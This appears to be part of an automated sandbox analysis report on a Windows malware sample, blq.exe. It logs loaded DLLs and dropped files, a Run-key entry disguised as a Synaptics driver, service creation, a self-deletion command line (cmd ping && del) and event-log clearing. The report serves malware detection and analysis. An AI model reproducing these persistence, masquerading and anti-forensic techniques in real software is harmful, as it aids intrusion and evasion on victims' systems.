                          Source: C:\Users\user\Desktop\blq.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\Desktop\blq.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\Desktop\blq.exeSection loaded: wlidprov.dllJump to behavior
                          Source: C:\Users\user\Desktop\blq.exeSection loaded: samcli.dllJump to behavior
                          Source: C:\Users\user\Desktop\blq.exeSection loaded: provsvc.dllJump to behavior
                          Source: C:\Users\user\Desktop\blq.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\Desktop\blq.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\Desktop\blq.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\blq.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\blq.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\blq.exeSection loaded: twext.dllJump to behavior
                          Source: C:\Users\user\Desktop\blq.exeSection loaded: ntshrui.dllJump to behavior
                          Source: C:\Users\user\Desktop\blq.exeSection loaded: starttiledata.dllJump to behavior
                          Source: C:\Users\user\Desktop\blq.exeSection loaded: acppage.dllJump to behavior
                          Source: C:\Users\user\Desktop\blq.exeSection loaded: sfc.dllJump to behavior
                          Source: C:\Users\user\Desktop\blq.exeSection loaded: msi.dllJump to behavior
                          Source: C:\Users\user\Desktop\blq.exeSection loaded: aepic.dllJump to behavior
                          Source: C:\Users\user\Desktop\blq.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\Desktop\blq.exeSection loaded: sfc_os.dllJump to behavior
                          Source: C:\Users\user\Desktop\._cache_blq.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\._cache_blq.exeSection loaded: mfc42.dllJump to behavior
                          Source: C:\Users\user\Desktop\._cache_blq.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\Desktop\._cache_blq.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\Desktop\._cache_blq.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\._cache_blq.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\._cache_blq.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\._cache_blq.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\._cache_blq.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\Desktop\._cache_blq.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\._cache_blq.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\Desktop\._cache_blq.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\Desktop\._cache_blq.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\Desktop\._cache_blq.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\Desktop\._cache_blq.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\._cache_blq.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\Desktop\._cache_blq.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Desktop\._cache_blq.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\._cache_blq.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\Desktop\._cache_blq.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\Desktop\._cache_blq.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\Desktop\._cache_blq.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\Desktop\._cache_blq.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\Desktop\._cache_blq.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\._cache_blq.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: version.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wsock32.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netapi32.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: textshaping.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: napinsp.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: pnrpnsp.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wshbth.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: nlaapi.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winrnr.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dll
                          Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dll
                          Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
                          Source: C:\Windows\SysWOW64\encvbk.exeSection loaded: wininet.dll
                          Source: C:\Windows\SysWOW64\encvbk.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\SysWOW64\encvbk.exeSection loaded: mswsock.dll
                          Source: C:\Windows\SysWOW64\encvbk.exeSection loaded: napinsp.dll
                          Source: C:\Windows\SysWOW64\encvbk.exeSection loaded: pnrpnsp.dll
                          Source: C:\Windows\SysWOW64\encvbk.exeSection loaded: wshbth.dll
                          Source: C:\Windows\SysWOW64\encvbk.exeSection loaded: nlaapi.dll
                          Source: C:\Windows\SysWOW64\encvbk.exeSection loaded: iphlpapi.dll
                          Source: C:\Windows\SysWOW64\encvbk.exeSection loaded: dnsapi.dll
                          Source: C:\Windows\SysWOW64\encvbk.exeSection loaded: winrnr.dll
                          Source: C:\Windows\SysWOW64\encvbk.exeSection loaded: fwpuclnt.dll
                          Source: C:\Windows\SysWOW64\encvbk.exeSection loaded: rasadhlp.dll
                          Source: C:\Windows\SysWOW64\encvbk.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\SysWOW64\encvbk.exeSection loaded: devenum.dll
                          Source: C:\Windows\SysWOW64\encvbk.exeSection loaded: winmm.dll
                          Source: C:\Windows\SysWOW64\encvbk.exeSection loaded: ntmarta.dll
                          Source: C:\Windows\SysWOW64\encvbk.exeSection loaded: devobj.dll
                          Source: C:\Windows\SysWOW64\encvbk.exeSection loaded: msasn1.dll
                          Source: C:\Windows\SysWOW64\encvbk.exeSection loaded: msdmo.dll
                          Source: C:\Windows\SysWOW64\encvbk.exeSection loaded: avicap32.dll
                          Source: C:\Windows\SysWOW64\encvbk.exeSection loaded: msvfw32.dll
                          Source: C:\Windows\SysWOW64\encvbk.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\SysWOW64\encvbk.exeSection loaded: wldp.dll
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: version.dll
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wininet.dll
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wsock32.dll
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netapi32.dll
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: uxtheme.dll
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: windows.storage.dll
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wldp.dll
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: kernel.appcore.dll
                          Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: textshaping.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: wersvc.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: windowsperformancerecordercontrol.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: weretw.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: faultrep.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: dbghelp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: dbgcore.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: printworkflowservice.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: ondemandbrokerclient.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\svchost.exeSection loaded: onecoreuapcommonproxystub.dll
                          Source: C:\Users\user\Desktop\blq.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeFile written: C:\Users\user\AppData\Local\Temp\l6DX2RD.iniJump to behavior
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
                          Source: Binary string: rundll32.pdb source: svchost.exe, 00000004.00000003.1664131085.0000000002E2D000.00000004.00000020.00020000.00000000.sdmp, encvbk.exe, encvbk.exe, 0000000A.00000002.4116465033.0000000000DD1000.00000020.00000001.01000000.0000000B.sdmp, encvbk.exe.4.dr
                          Source: Binary string: rundll32.pdbGCTL source: svchost.exe, 00000004.00000003.1664131085.0000000002E2D000.00000004.00000020.00020000.00000000.sdmp, encvbk.exe, 0000000A.00000002.4116465033.0000000000DD1000.00000020.00000001.01000000.0000000B.sdmp, encvbk.exe.4.dr
                          Source: encvbk.exe.4.drStatic PE information: 0x6A8F1B39 [Wed Aug 26 16:58:33 2026 UTC]
                          Source: C:\Users\user\Desktop\._cache_blq.exeCode function: 1_2_00401B6B LoadLibraryA,GetProcAddress,__p__pgmptr,sprintf,GetCurrentProcess,SetPriorityClass,GetCurrentThread,SetThreadPriority,ShellExecuteA,1_2_00401B6B
                          Source: encvbk.exe.4.drStatic PE information: section name: .didat
                          Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 3_2_054E000C push 10005A16h; retf 3_2_054E005D
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_10004C68 push eax; ret 4_2_10004C86
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_10004CA0 push eax; ret 4_2_10004CCE
                          Source: C:\Windows\SysWOW64\encvbk.exeCode function: 10_2_00DD6883 push ecx; ret 10_2_00DD6896
                          Source: C:\Windows\SysWOW64\encvbk.exeCode function: 10_2_00DD682D push ecx; ret 10_2_00DD6840

                          Persistence and Installation Behavior

                          barindex
                          Drops PE files to the document folder of the user
                          Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\DTBZGIOOSO\~$cache1Jump to dropped file
                          Drops executables to the windows directory (C:\Windows) and starts them
                          Source: C:\Windows\SysWOW64\svchost.exeExecutable created and started: C:\Windows\SysWOW64\encvbk.exeJump to behavior
                          Source: C:\Users\user\Desktop\blq.exeFile created: C:\ProgramData\Synaptics\RCXAFD2.tmpJump to dropped file
                          Source: C:\Users\user\Desktop\._cache_blq.exeFile created: C:\Program Files (x86)\6795234.dllJump to dropped file
                          Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Windows\SysWOW64\encvbk.exeJump to dropped file
                          Source: C:\Users\user\Desktop\blq.exeFile created: C:\ProgramData\Synaptics\Synaptics.exeJump to dropped file
                          Source: C:\Users\user\Desktop\blq.exeFile created: C:\Users\user\Desktop\._cache_blq.exeJump to dropped file
                          Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\DTBZGIOOSO\~$cache1Jump to dropped file
                          Source: C:\Users\user\Desktop\blq.exeFile created: C:\ProgramData\Synaptics\RCXAFD2.tmpJump to dropped file
                          Source: C:\Users\user\Desktop\blq.exeFile created: C:\ProgramData\Synaptics\Synaptics.exeJump to dropped file
                          Source: C:\Users\user\Desktop\._cache_blq.exeFile created: C:\Program Files (x86)\6795234.dllJump to dropped file
                          Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Windows\SysWOW64\encvbk.exeJump to dropped file
                          Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\DTBZGIOOSO\~$cache1Jump to dropped file
                          Source: C:\Users\user\Desktop\._cache_blq.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\encvbkJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_10001A43 OpenSCManagerA,OpenServiceA,StartServiceA,GetLastError,CloseServiceHandle,QueryServiceStatus,Sleep,CloseServiceHandle,CloseServiceHandle,4_2_10001A43
                          Source: C:\Users\user\Desktop\blq.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device DriverJump to behavior
                          Source: C:\Users\user\Desktop\blq.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device DriverJump to behavior

                          Hooking and other Techniques for Hiding and Protection

                          barindex
                          Self deletion via cmd or bat file
                          Source: C:\Users\user\Desktop\._cache_blq.exeProcess created: "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 1 && del /f/q "C:\Users\user\Desktop\._cache_blq.exe"
                          Source: C:\Users\user\Desktop\._cache_blq.exeProcess created: "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 1 && del /f/q "C:\Users\user\Desktop\._cache_blq.exe"Jump to behavior
                          Source: C:\Users\user\Desktop\._cache_blq.exeCode function: 1_2_00402400 IsIconic,1_2_00402400
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_1000265E OpenEventLogA,ClearEventLogA,CloseEventLog,4_2_1000265E
